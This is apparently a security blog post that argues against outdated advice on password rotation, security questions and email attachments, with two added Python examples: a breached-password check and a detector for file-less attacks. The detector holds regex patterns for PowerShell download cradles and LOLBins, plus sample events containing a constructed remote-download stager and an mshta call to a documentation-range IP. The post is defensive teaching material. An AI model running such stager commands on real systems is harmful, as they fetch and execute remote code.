As technology advances and cyber threats evolve, it is worth revisiting long-standing security principles to check that they still hold. Axioms that once formed the cornerstone of digital security guidance can fail in a rapidly changing threat landscape: maxims such as “be cautious of email spelling errors” (when it comes to phishing) and “frequently change your passwords” have, with time, shifted from reliable safeguards to potential liabilities.
In this blog we look at some well-meaning but now potentially harmful cybersecurity wisdom that needs to be reconsidered, and at the approaches that should replace it.
The ghosts of misguided cybersecurity advice past
Regular password changes
The practice of continually changing passwords was once held in high regard as a fundamental safeguard. However, as the digital landscape has matured and our understanding of security has evolved, it has become increasingly evident that this conventional wisdom may not be as effective as previously believed.
The premise behind frequent password changes was to thwart attackers by limiting how long a cracked or guessed password stayed useful. In practice, the approach produced the opposite effect. Users, burdened with memorising and constantly updating their passwords, resorted to simplistic, easily guessable combinations or minor alterations of the previous password (“Summer2023!” becomes “Autumn2023!”), patterns that attackers model explicitly. A rotation schedule also does nothing against the common case: a password stolen by phishing or leaked in a breach is used within hours, long before the next scheduled change, so rotation weakened the overall security posture while adding little real protection.
Considering these shortcomings, the strategy has shifted, and current guidance (NIST SP 800-63B) no longer recommends periodic expiry or forced composition rules. Rather than focusing on the frequency of password changes, we advocate long, random, unique passwords that attackers can neither guess nor crack offline. Length and randomness matter more than a mandated mix of letters, numbers and symbols, which mostly yields predictable substitutions such as “P@ssw0rd1!”. A password manager that generates and stores a distinct secret for every site, combined with screening new passwords against lists of passwords exposed in past breaches, provides a far more formidable barrier to unauthorised access.
The key to security in this model is not routine rotation but prompt action when a compromise is suspected or known. Monitor account activity and respond to suspicious events such as unfamiliar login attempts or unusual behaviour. When such signs appear, or when a service you use announces a breach, change that password immediately (and anywhere else it was reused), and enable multi-factor authentication (MFA) so that a leaked password alone is no longer enough.
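The screening step is simple to implement. The following added example (not code from the original post) shows the k-anonymity lookup used by Have I Been Pwned’s Pwned Passwords range API: only the first five hex characters of the password’s SHA-1 digest are sent, the service returns every suffix under that prefix together with a breach count, and the match happens locally, so the password never leaves the client. The range response embedded below is a constructed sample in that format (the real count for “password” is far higher), the offline `fetch_range` stands in for the HTTP call, and the 12-character minimum is a policy choice of this example rather than anything from the post.

```python
"""Check a candidate password against a breached-password corpus without
sending the password anywhere: the k-anonymity range lookup used by the
Have I Been Pwned "Pwned Passwords" API (SHA-1, 5-hex-character prefix).
"""
from __future__ import annotations

import hashlib
from typing import Callable

PREFIX_LEN = 5       # hex characters of the digest that leave the client
MIN_LENGTH = 12      # assumed local policy; NIST SP 800-63B requires at least 8

# Constructed sample of a GET /range/5BAA6 response body (SUFFIX:COUNT per line).
# The first suffix is the real SHA-1 suffix of "password"; the count and the
# other two lines are made up for this example. The real API returns hundreds
# of suffixes for every prefix; here unknown prefixes yield an empty body.
SAMPLE_RANGES = {
    "5BAA6": (
        "1E4C9B93F3F0682250B6CF8331B7EE68FD8:9545824\n"
        "003D68EB55068C33ACE09247EE4C639306B:3\n"
        "012C192B2F16F82EA0EB9EF18D9D539B0DD:2\n"
    ),
}


def fetch_range(prefix: str) -> str:
    """Offline stand-in for GET https://api.pwnedpasswords.com/range/{prefix}."""
    return SAMPLE_RANGES.get(prefix.upper(), "")


def sha1_hex(password: str) -> str:
    """Uppercase hex SHA-1 of the password, which is how the corpus is keyed."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


def split_for_range_query(password: str) -> tuple[str, str]:
    """Return (prefix, suffix). Only the prefix is transmitted; the suffix
    stays on the client and is compared against the response locally."""
    digest = sha1_hex(password)
    return digest[:PREFIX_LEN], digest[PREFIX_LEN:]


def parse_range_response(body: str) -> dict[str, int]:
    """Parse the 'SUFFIX:COUNT' lines of a range response."""
    counts: dict[str, int] = {}
    for line in body.splitlines():
        line = line.strip()
        if not line:
            continue
        suffix, _, count = line.partition(":")
        counts[suffix.upper()] = int(count)
    return counts


def breach_count(password: str, fetch: Callable[[str], str] = fetch_range) -> int:
    """How many times the password appears in the corpus (0 = not seen)."""
    prefix, suffix = split_for_range_query(password)
    return parse_range_response(fetch(prefix)).get(suffix, 0)


def evaluate_password(password: str, fetch: Callable[[str], str] = fetch_range) -> tuple[bool, str]:
    """Modern rule set: not already breached, and long enough. No composition
    rules and no expiry date. A breached password is rejected whatever its length."""
    if breach_count(password, fetch) > 0:
        return False, "breached"
    if len(password) < MIN_LENGTH:
        return False, "too_short"
    return True, "ok"


if __name__ == "__main__":
    for candidate in ("password", "Tr0ub4dor", "correct horse battery staple"):
        prefix, _ = split_for_range_query(candidate)
        print(f"{candidate!r}: sends prefix {prefix} -> {evaluate_password(candidate)}")
```

Swapping `fetch_range` for a real HTTPS GET of the same URL shape is the only change needed to use this against the live service; the prefix is all the request ever contains.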
Security questions
Security questions have long been used as an additional layer of protection for user accounts. Innocuous prompts such as “Your first pet’s name” or “Your mother’s maiden name” were once considered a reliable way to verify identity when recovering a forgotten password or resolving account issues. In today’s information-rich world, their effectiveness has been significantly undermined.
The fundamental flaw in the traditional approach to security questions lies in their reliance on personal information that is no longer truly confidential. In the age of social media, people openly share details about their lives, including their pets’ names, family relationships, and other personal anecdotes. As a result, what were once considered closely guarded secrets have become easily accessible to anyone with internet access, including potential hackers.
This shift in the accessibility of personal information has transformed security questions from a somewhat reliable safeguard into low-hanging fruit for cybercriminals. Armed with readily available details from social media profiles and public records, malicious actors can often bypass security questions with alarming ease, gaining unauthorised access to user accounts. What was intended to be a security feature has, in some cases, inadvertently become a backdoor for intrusion.
Recognising these weaknesses, service providers should stop treating knowledge-based questions as a standalone recovery factor, and users should stop treating them as questions at all. If a service insists on them, choose prompts whose answers are not guessable or publicly available, or, better, answer with an unrelated random string stored in a password manager, so the “first pet’s name” is just a second secret rather than a fact anyone can look up. Account recovery should instead rest on multi-factor authentication (MFA) or other verification methods that do not depend on details of a person’s life.
Unsolicited email attachments
One long-standing piece of advice we have all heard is to exercise caution with unsolicited email attachments. This wisdom remains pertinent, as email continues to be a primary vector for malware and phishing. However, as technology advances and cyber threats evolve, a focus on attachments alone is no longer enough to safeguard our digital domains.
Traditionally, the warning against opening unsolicited attachments aimed to protect users from downloading malicious files or inadvertently executing harmful scripts contained within these attachments. This advice has undeniably been a lifesaver, preventing countless individuals and organisations from falling victim to email-based attacks.
Yet a growing class of “file-less attacks” has gained prominence. Unlike their traditional counterparts, these attacks do not rely on delivering a malicious executable as an attachment. Instead, the payload runs in memory through tools already trusted on the device: PowerShell, Windows Management Instrumentation, script hosts and Office macros. The initial trigger is usually still a user action, such as clicking a link or approving a macro prompt, and sometimes an unpatched vulnerability, but the user never sees a suspicious file to download, and little is written to disk for a conventional scanner to find.
This shift in attack methodology has implications for how we think about email security. Remaining cautious about attachments is still vital, but it is no longer sufficient. Cybercriminals have become adept at exploiting software vulnerabilities and weaknesses within operating systems, and at abusing built-in tooling, leaving far less behind on disk than an attachment would.
A more comprehensive approach to email security is therefore essential. This means scrutinising attachments, but also regularly updating and patching software and systems to remove the vulnerabilities these attacks exploit. Endpoint protection that watches behaviour rather than only scanning files matters equally: logging what PowerShell and other script hosts execute, flagging an Office application that spawns a script interpreter, and blocking macros in documents that arrived from the internet all catch activity that a file-based scan would miss.
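To make “watching behaviour” concrete, here is an added example (not from the original post) of the kind of check an endpoint agent or SIEM rule applies to process-creation events. The four log entries are constructed for this example, the IP address is from a documentation range, and the indicator patterns and the two-indicator threshold are this example’s assumptions rather than any vendor’s rule set. Note that the encoded PowerShell is decoded before matching; a check that only looks at the raw command line would miss the download cradle inside it.

```python
"""Behavioural indicators of file-less activity in process-creation
events. Nothing here inspects a file on disk: the signal is what was
launched, by what, and with which arguments.

All sample events are constructed for this example.
"""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    ts: str        # ISO-8601 timestamp
    parent: str    # image name of the parent process
    image: str     # image name of the created process
    cmdline: str   # full command line as logged


# Patterns that living-off-the-land tradecraft tends to need (assumed indicator set).
INDICATORS = {
    "encoded_command": re.compile(r"(?i)\s-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}"),
    "download_cradle": re.compile(r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer"),
    "invoke_expression": re.compile(r"(?i)\bIEX\b|Invoke-Expression"),
    "hidden_window": re.compile(r"(?i)\s-(?:w|win|windowstyle)\s+hidden"),
    "bypass_policy": re.compile(r"(?i)-(?:ep|exec|executionpolicy)\s+bypass"),
    "lolbin_script_host": re.compile(r"(?i)\b(?:mshta|rundll32|regsvr32|wmic)\.exe\b"),
}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def encode_powershell(script: str) -> str:
    """Build the -EncodedCommand form (base64 of UTF-16LE). Used here only to
    construct the sample the way an attacker's loader would."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> str:
    """Recover the script hidden behind -EncodedCommand, or '' if there is none."""
    match = INDICATORS["encoded_command"].search(cmdline)
    if not match:
        return ""
    blob = match.group(0).split()[-1]
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_event(ev: ProcessEvent) -> list[str]:
    """Names of the indicators present, including those visible only after
    decoding an encoded command, plus the parent/child relationship check."""
    searchable = ev.cmdline + " " + decode_encoded_command(ev.cmdline)
    hits = [name for name, rx in INDICATORS.items() if rx.search(searchable)]
    if ev.parent.lower() in OFFICE_PARENTS and ev.image.lower() in SCRIPT_HOSTS:
        hits.append("office_spawned_script_host")
    return hits


def triage(events: list[ProcessEvent], threshold: int = 2) -> list[tuple[ProcessEvent, list[str]]]:
    """Events carrying at least `threshold` indicators (threshold is this
    example's assumption; tune it against your own baseline)."""
    flagged = []
    for ev in events:
        hits = score_event(ev)
        if len(hits) >= threshold:
            flagged.append((ev, hits))
    return flagged


# Constructed stager: in-memory download and execution, nothing written to disk.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage2.ps1')"

SAMPLE_EVENTS = [
    ProcessEvent("2024-03-11T09:14:02Z", "explorer.exe", "powershell.exe",
                 "powershell.exe -NoProfile -Command Get-ChildItem C:\\Users\\alice\\Documents"),
    ProcessEvent("2024-03-11T09:15:40Z", "winword.exe", "powershell.exe",
                 "powershell.exe -NoP -W Hidden -Exec Bypass -EncodedCommand " + encode_powershell(STAGER)),
    ProcessEvent("2024-03-11T09:16:05Z", "excel.exe", "mshta.exe",
                 "mshta.exe http://198.51.100.7/launch.hta"),
    ProcessEvent("2024-03-11T09:17:13Z", "services.exe", "svchost.exe",
                 "svchost.exe -k netsvcs -p"),
]

if __name__ == "__main__":
    for ev, hits in triage(SAMPLE_EVENTS):
        print(f"{ev.ts} {ev.parent} -> {ev.image}: {', '.join(hits)}")
```

The benign administrator session (first event) and the service host (last event) score zero; the Word-spawned encoded PowerShell and the Excel-spawned `mshta.exe` are the two that surface, and neither involved an attachment being scanned.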
Furthermore, user education remains pivotal. Individuals and organisations must understand that the threat is no longer just the attachment: embedded links, macro prompts and requests to “enable content” deserve the same suspicion, and vigilance has to extend to every aspect of email communication.
Forward-thinking approaches for a new era
Traditional notions of trust and security are being redefined, and we must adapt our practices to the evolving threat landscape. The following principles warrant closer examination:
MFA: Strengthening Authentication through Diverse Channels
Multi-factor authentication (MFA) is a robust defence against account takeover. However, it is not enough merely to implement MFA; we must also consider how we guide users through verification. Rather than embedding links in emails or messages, a practice that trains users to click and exposes them to phishing, direct them to reach the page themselves: type the address, use a bookmark, or navigate from the official website’s home page.
For account verification, one-time codes sent by email or SMS are a better choice than verification links, because a code carries no destination for an attacker to manipulate: there is no redirect to a fraudulent site. They are not a complete answer, though. A code typed into a convincing look-alike page can be relayed to the real service within its validity window, and SMS is exposed to SIM swapping. Where a service offers them, authenticator apps are better than SMS, and phishing-resistant methods such as FIDO2/WebAuthn security keys, which are bound to the genuine site’s origin, are better still. Pairing MFA with channels that give attackers nothing to redirect strengthens the overall authentication process and reduces the likelihood of a successful attack.
Don’t Underestimate your Adversary
It is crucial to dispel the notion that cybercriminals are simplistic adversaries. Many malicious actors are part of highly sophisticated and well-funded operations that continually evolve to exploit vulnerabilities. Our security policies must reflect this reality.
To effectively counter these advanced threats, organisations and individuals alike should adopt a proactive and adaptive security posture. This includes continuous monitoring, threat intelligence gathering, and investing in advanced security technologies. It is essential to stay one step ahead of cybercriminals, recognising that they are constantly innovating.
Well-intentioned but outdated advice can lull us into a false sense of security. From the debunked practice of frequent password changes to the assumption that a phishing email will betray itself through spelling errors, our cybersecurity guidance needs revising.
As cyber threats grow in complexity, so must our awareness and methods of defence.